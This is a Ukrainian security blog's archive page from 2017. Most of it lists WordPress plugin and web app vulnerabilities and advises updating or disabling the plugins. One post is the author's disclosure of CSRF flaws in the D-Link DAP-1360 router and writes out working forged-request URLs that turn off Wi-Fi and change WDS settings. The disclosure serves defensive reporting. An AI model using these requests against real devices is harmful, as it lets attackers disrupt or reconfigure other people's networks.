Архів для категорії 'Уразливості'

Уразливості в плагінах для WordPress №249

23:57 21.04.2017

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Private Only, Navis DocumentCloud, Responsive Thumbnail Slider, Captain Slider, sourceAFRICA. Для котрих з’явилися експлоіти.

  • WordPress Private Only 3.5.1 CSRF / Cross Site Scripting (деталі)
  • WordPress Navis DocumentCloud 0.1 Cross Site Scripting (деталі)
  • WordPress Responsive Thumbnail Slider 1.0 Shell Upload (деталі)
  • WordPress Captain Slider 1.0.6 Cross Site Scripting (деталі)
  • WordPress sourceAFRICA 0.1.3 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

17:20 21.04.2017

В даній добірці уразливості в веб додатках:

  • SAP BusinessObjects Persistent Cross Site Scripting (деталі)
  • Reflected Cross-Site Scripting vulnerability in asdoc generated documentation (деталі)
  • XSS vuln in phpTrafficA (деталі)
  • Multiple vulnerabilities in MediaWiki (деталі)
  • SAP Business Objects Information Disclosure (деталі)

Добірка уразливостей

20:06 19.04.2017

В даній добірці уразливості в веб додатках:

  • Multiple Critical Security Vulnerabilities in SAP Governance, Risk and Compliance (SAP GRC) (деталі)
  • Apache Cassandra remote execution of arbitrary code (деталі)
  • HotExBilling Manager Cross-site scripting (XSS) vulnerability (деталі)
  • Apache Flex reflected XSS vulnerability (деталі)
  • Port scanning in SAP BusinessObjects Explorer (деталі)

Уразливості в плагінах для WordPress №248

23:58 01.04.2017

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах iframe, Googmonify, Analyticator, Car Rental System, YouTube Embed. Для котрих з’явилися експлоіти.

  • WordPress iframe 3.0 Reflective Cross Site Scripting (деталі)
  • WordPress Googmonify 0.8.1 Cross Site Request Forgery / Cross Site Scripting (деталі)
  • Google Analyticator 6.4.9.4 Cross Site Scripting (деталі)
  • WordPress Car Rental System SQL Injection (деталі)
  • WordPress YouTube Embed 3.3.2 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

16:22 31.03.2017

В даній добірці уразливості в веб додатках:

Уразливості в плагінах для WordPress №247

20:09 30.03.2017

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Monetize, Video Gallery, WP Symposium, iframe, OAuth2 Complete. Для котрих з’явилися експлоіти.

  • WordPress Monetize 1.03 Cross Site Request Forgery / Cross Site Scripting (деталі)
  • WordPress Video Gallery 2.7 SQL Injection (деталі)
  • WordPress WP Symposium 15.1 SQL Injection (деталі)
  • WordPress iframe 3.0 Stored Cross Site Scripting (деталі)
  • WordPress OAuth2 Complete 3.1.3 Insecure Random (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

16:22 29.03.2017

В даній добірці уразливості в веб додатках:

Уразливості в плагінах для WordPress №246

23:55 04.03.2017

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Recent Backups, WPTF Image Gallery, Avenir-Soft Direct Download, Bookmarkify та в WordPress. Для котрих з’явилися експлоіти.

  • WordPress Recent Backups 0.7 File Download (деталі)
  • WordPress WPTF Image Gallery 1.03 File Download (деталі)
  • WordPress 3.8.1 / 3.8.2 / 4.2.2 Cross Site Request Forgery (деталі)
  • WordPress Avenir-Soft Direct Download 1.0 XSS / CSRF (деталі)
  • WordPress Bookmarkify 2.9.2 Cross Site Request Forgery / Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

PRL і CSRF уразливості в D-Link DAP-1360

23:52 03.03.2017

Продовжуючи тему уразливостей в D-Link DAP-1360. У січні, 27.01.2016, я виявив нові уразливості в пристрої. Це Predictable Resource Location та Cross-Site Request Forgery уразливості в D-Link DAP-1360 (Wi-Fi Access Point and Router).

Predictable Resource Location (WASC-34):

Якщо використовувати D-Link DAP-1360 в якості роутера, до можливий доступ до адмінки за адресою http://dlink.ap. Дана адреса застосовується в різних пристроях D-Link з функцією роутера. Це полегшує CSRF та XSS атаки - всі, про які писав в цій та попередніх публікаціях. Бо зміна IP вже не захистить і можна віддалено проводити CSRF атаки використовуючи ім’я домену.

CSRF (WASC-09):

Зокрема можна вимкнути Wi-Fi. При цьому зміна IP з дефолтного 192.168.0.50 на іншій не допоможе.

http://dlink.ap/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=39&res_struct_size=0&res_buf={%22Radio%22:false,%22mbssidNum%22:1,%22mbssidCur%22:1}

CSRF (WASC-09):

В розділі Wi-Fi - WDS можна змінити параметр WDS Mode:

Вимкнути - Disable:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=109&res_struct_size=0&res_buf={%22wds%22:{%22WdsEnable%22:%220%22}}

Увімкнути - Bridge mode:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=109&res_struct_size=0&res_buf={%22wds%22:{%22WdsEnable%22:%222%22,%22WdsPhyMode%22:%22CCK%22,%22WdsEncrypType%22:%22WEP%22,%22WdsKey%22:%22wfkey%22,%22Wds1Mac%22:%22%22,%22Wds2Mac%22:%22%22,%22Wds3Mac%22:%22%22,%22Wds4Mac%22:%22%22}}

Увімкнути - Repeater mode:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=109&res_struct_size=0&res_buf={%22wds%22:{%22WdsEnable%22:%223%22,%22WdsPhyMode%22:%22CCK%22,%22WdsEncrypType%22:%22WEP%22,%22WdsKey%22:%22wfkey%22,%22Wds1Mac%22:%22%22,%22Wds2Mac%22:%22%22,%22Wds3Mac%22:%22%22,%22Wds4Mac%22:%22%22}}

Уразлива версія D-Link DAP-1360, Firmware 1.0.0. Дана модель з іншими прошивками також повинна бути вразливою.

Добірка уразливостей

17:21 03.03.2017

В даній добірці уразливості в веб додатках:

  • Outlook.com for Android fails to validate server certificates (деталі)
  • Mailman vulnerability (деталі)
  • WSO2 Identity Server multiple vulnerabilities (деталі)
  • Manage Engine Desktop Central 9 - Unauthorised administrative password reset (деталі)
  • HP Service Manager, Multiple Vulnerabilities (деталі)